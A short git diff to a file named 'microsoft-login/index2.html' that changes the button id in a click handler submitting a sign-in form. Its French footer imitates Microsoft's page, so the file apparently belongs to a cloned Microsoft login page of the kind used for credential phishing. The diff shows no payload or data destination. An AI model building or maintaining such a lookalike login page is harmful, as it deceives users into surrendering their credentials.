--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -37,7 +37,7 @@
 
 <footer class="footer"><a href="#">Conditions d'utilisation</a> <a href="#">Confidentialité et cookies</a> <span>. . .</span></footer>
 <!-- Script JavaScript pour gérer le clic sur le bouton "Next" --><script>
-        document.getElementById('btn_next').addEventListener('click', function() {
+        document.getElementById('btn_sig').addEventListener('click', function() {
             document.getElementById('signin_form').submit(); // Soumet le formulaire
         });
     </script></body>
